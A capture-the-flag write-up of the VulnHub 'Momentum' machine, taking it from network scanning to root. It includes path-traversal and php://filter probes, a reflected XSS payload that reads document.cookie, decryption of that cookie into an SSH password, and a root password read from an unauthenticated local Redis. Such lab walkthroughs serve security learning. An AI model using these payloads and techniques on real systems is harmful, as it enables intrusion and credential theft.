Momentum
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:75:2a:10 1 60 PCS Systemtechnik GmbH
192.168.56.137 08:00:27:80:8e:c9 1 60 PCS Systemtechnik GmbH
Using netdiscover, which ships with Kali Linux, the target's IP address is identified as 192.168.56.137 (the ARP sweep runs on the VirtualBox host-only interface eth1; 192.168.56.1 is the host itself and .100 is normally VirtualBox's host-only DHCP server, leaving .137 as the only candidate).
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.137 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-27 21:15 EST
Nmap scan report for bogon (192.168.56.137)
Host is up (0.00014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5c:8e:2c:cc:c1:b0:3e:7c:0e:22:34:d8:60:31:4e:62 (RSA)
| 256 81:fd:c6:4c:5a:50:0a:27:ea:83:38:64:b9:8b:bd:c1 (ECDSA)
|_ 256 c1:8f:87:c1:52:09:27:60:5f:2e:2d:e0:08:03:72:c8 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Momentum | Index
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:80:8E:C9 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.76 seconds
The Nmap scan shows two open ports on the target: 22 (SSH, OpenSSH 7.9p1 on Debian 10) and 80 (HTTP, Apache 2.4.38).
Getting a shell
The rest of the enumeration centres on port 80. Opening it in a browser shows a page with four images; download them to Kali:
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ ls
a.jpg b.jpg c.jpg d.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ exiftool a.jpg
ExifTool Version Number : 12.44
File Name : a.jpg
Directory : .
File Size : 501 kB
File Modification Date/Time : 2022:12:27 21:18:06-05:00
File Access Date/Time : 2022:12:27 21:18:06-05:00
File Inode Change Date/Time : 2022:12:27 21:18:06-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 1920
Image Height : 1080
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 1920x1080
Megapixels : 2.1
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ steghide extract -sf a.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ stegseek a.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.85% (133.2 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ binwalk -e a.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
After the same checks (exiftool, steghide, stegseek, binwalk) there is reason to believe nothing more can be extracted from the four images. Note that stegseek's failure only means the steghide passphrase is not in its default wordlist (rockyou.txt, which is what the 133 MB progress figure corresponds to); it does not prove that nothing is embedded. Attention moves to the web content itself:
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ curl http://192.168.56.137/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.137 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ nikto -h http://192.168.56.137
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.137
+ Target Hostname: 192.168.56.137
+ Target Port: 80
+ Start Time: 2022-12-27 21:22:04 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 7d1, size: 5c086352f5b80, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2022-12-27 21:23:12 (GMT-5) (68 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)? n
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.137
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/12/27 21:23:46 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
/server-status (Status: 403) [Size: 279]
Progress: 218055 / 220561 (98.86%)===============================================================
2022/12/27 21:24:23 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.137
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,html,sh,js,txt
[+] Timeout: 10s
===============================================================
2022/12/27 21:26:08 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 2001]
/img (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1323086 / 1323366 (99.98%)===============================================================
2022/12/27 21:30:25 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.137
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,html,sh,js,txt
[+] Timeout: 10s
===============================================================
2022/12/27 21:31:32 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/img (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/index.html (Status: 200) [Size: 2001]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
Progress: 848352 / 850254 (99.78%)===============================================================
2022/12/27 21:34:17 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.137
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,html,sh,js,txt
[+] Timeout: 10s
===============================================================
2022/12/27 21:34:44 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.js (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.htpasswd.txt (Status: 403) [Size: 279]
/.htaccess.php (Status: 403) [Size: 279]
/.htaccess.txt (Status: 403) [Size: 279]
/.htaccess.sh (Status: 403) [Size: 279]
/.htpasswd.js (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htpasswd.html (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/.htaccess.html (Status: 403) [Size: 279]
/.htpasswd.sh (Status: 403) [Size: 279]
/css (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/img (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/index.html (Status: 200) [Size: 2001]
/js (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/server-status (Status: 403) [Size: 279]
Progress: 120416 / 122862 (98.01%)===============================================================
2022/12/27 21:35:05 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.137
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,html,sh,js,txt
[+] Timeout: 10s
===============================================================
2022/12/27 21:35:35 Starting gobuster in directory enumeration mode
===============================================================
/js (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/img (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/index.html (Status: 200) [Size: 2001]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/server-status (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
Progress: 135449 / 373710 (36.24%)[ERROR] 2022/12/27 21:35:57 [!] parse "http://192.168.56.137/besalu\t.php": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:57 [!] parse "http://192.168.56.137/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:57 [!] parse "http://192.168.56.137/besalu\t.sh": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:57 [!] parse "http://192.168.56.137/besalu\t.js": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:57 [!] parse "http://192.168.56.137/besalu\t.txt": net/url: invalid control character in URL
Progress: 143081 / 373710 (38.29%)[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log.php": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log.html": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log.sh": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log.js": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log.txt": net/url: invalid control character in URL
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 2001]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
Progress: 372828 / 373710 (99.76%)===============================================================
2022/12/27 21:36:46 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.137
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,html,sh,js,txt
[+] Timeout: 10s
===============================================================
2022/12/27 21:37:06 Starting gobuster in directory enumeration mode
===============================================================
/js (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/img (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/index.html (Status: 200) [Size: 2001]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/server-status (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
Progress: 134643 / 180006 (74.80%)[ERROR] 2022/12/27 21:37:39 [!] parse "http://192.168.56.137/besalu\t.php": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:39 [!] parse "http://192.168.56.137/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:39 [!] parse "http://192.168.56.137/besalu\t.sh": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:39 [!] parse "http://192.168.56.137/besalu\t.js": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:39 [!] parse "http://192.168.56.137/besalu\t.txt": net/url: invalid control character in URL
Progress: 143139 / 180006 (79.52%)[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log.js": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log.txt": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log.php": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log.html": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log.sh": net/url: invalid control character in URL
Progress: 179448 / 180006 (99.69%)===============================================================
2022/12/27 21:37:49 Finished
===============================================================
None of these scans turned up a directory or file of any value. Back on the home page, clicking an image leads to a URL of the form:
http://192.168.56.137/opus-details.php?id=visor
Could this be a file inclusion vulnerability? But requesting
http://192.168.56.137/opus-details.php?id=../../../../../../etc/passwd
only returns the literal string /etc/passwd as page text, so there may be a filter. Trying a PHP filter wrapper to read the script's own source:
http://192.168.56.137/opus-details.php?id=php://filter/convert.base64-encode/resource=opus-details
still returns no base64-encoded source. Rather than keep guessing at include() bypasses, look at the page's JavaScript:
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ curl http://192.168.56.137/js/main.js
function viewDetails(str) {
window.location.href = "opus-details.php?id="+str;
}
/*
var CryptoJS = require("crypto-js");
var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));
*/
On the web, logging in usually ends with the server setting a cookie. The cookie acts as a token: whoever presents it is treated as that user. If the cookie is stolen, an attacker can usually use it directly to act as you, without ever knowing the password. Script running in the page reads the current cookies through document.cookie (unless they carry the HttpOnly flag).
Since the id parameter is echoed into the page unescaped, build a URL that reflects a script reading the cookie:
http://192.168.56.137/opus-details.php?id=%3Cscript%3Ealert(document.cookie);%3C/script%3E
which pops an alert containing the cookie (the same value is visible in the browser's developer tools or in curl -i output; the XSS mainly confirms that id is rendered into the HTML unescaped):
cookie=U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt
From main.js we know this value was produced by CryptoJS.AES with the passphrase SecretPassphraseMomentum. The U2FsdGVkX1 prefix is the base64 of "Salted__": CryptoJS in passphrase mode emits OpenSSL's salted format, deriving an AES-256 key and IV from the passphrase and an 8-byte salt with EVP_BytesToKey (MD5) and encrypting in CBC mode with PKCS#7 padding. Decrypting it with an online AES tool (any CryptoJS-compatible decryptor) gives:
auxerre-alienum##
which turns out to be the SSH password for the user auxerre:
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ ssh [email protected]
The authenticity of host '192.168.56.137 (192.168.56.137)' can't be established.
ED25519 key fingerprint is SHA256:NLUFYImFHvyED76cAzjnxD3dTxP5rzmEHrx4acGvM9c.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.137' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux Momentum 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr 22 08:47:31 2021
auxerre@Momentum:~$ id
uid=1000(auxerre) gid=1000(auxerre) groups=1000(auxerre),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
auxerre@Momentum:~$ sudo -l
-bash: sudo: command not found
auxerre@Momentum:~$ ls -alh
total 28K
drwxr-xr-x 3 auxerre auxerre 4.0K Apr 22 2021 .
drwxr-xr-x 3 root root 4.0K Apr 19 2021 ..
-rw------- 1 auxerre auxerre 0 Apr 22 2021 .bash_history
-rw-r--r-- 1 auxerre auxerre 220 Apr 19 2021 .bash_logout
-rw-r--r-- 1 auxerre auxerre 3.5K Apr 19 2021 .bashrc
-rw-r--r-- 1 auxerre auxerre 807 Apr 19 2021 .profile
drwx------ 2 auxerre auxerre 4.0K Apr 21 2021 .ssh
-rwx------ 1 auxerre auxerre 146 Apr 22 2021 user.txt
auxerre@Momentum:~$ cat user.txt
[ Momentum - User Owned ]
---------------------------------------
flag : 84157165c30ad34d18945b647ec7f647
---------------------------------------
auxerre@Momentum:~$ cat .bash_history
Privilege escalation
Upload linpeas.sh to /tmp on the target, make it executable and run it. The output shows the host listening on port 6379 (Redis), bound to localhost only, which is why the external Nmap scan never saw it:
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp LISTEN 0 128 127.0.0.1:6379 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 [::1]:6379 [::]:*
tcp LISTEN 0 128 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
auxerre@Momentum:/tmp$ redis-cli
127.0.0.1:6379> keys *
1) "rootpass"
127.0.0.1:6379> get rootpass
"m0mentum-al1enum##"
127.0.0.1:6379> exit
auxerre@Momentum:/tmp$ su - root
Password:
root@Momentum:~# cd /root
root@Momentum:~# ls -alh
total 24K
drwx------ 3 root root 4.0K Apr 22 2021 .
drwxr-xr-x 18 root root 4.0K Apr 19 2021 ..
-rw------- 1 root root 0 Apr 22 2021 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Apr 21 2021 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwx------ 1 root root 162 Apr 22 2021 root.txt
root@Momentum:~# cat root.txt
[ Momentum - Rooted ]
---------------------------------------
Flag : 658ff660fdac0b079ea78238e5996e40
---------------------------------------
by alienum with <3
root@Momentum:~#
Lessons learned
- The URL pattern suggested a local file inclusion, but every attempt, php://filter wrappers included, went nowhere. What mattered was reading the response carefully: it was neither a 404 nor empty; the parameter value came back verbatim in the page. A value that is reflected rather than included points to injection into the HTML, not to include(), so the right next test is reflected XSS. Reading main.js then showed that the page hands id around in JavaScript, and the script payload injected through id did execute, which is what exposed the cookie.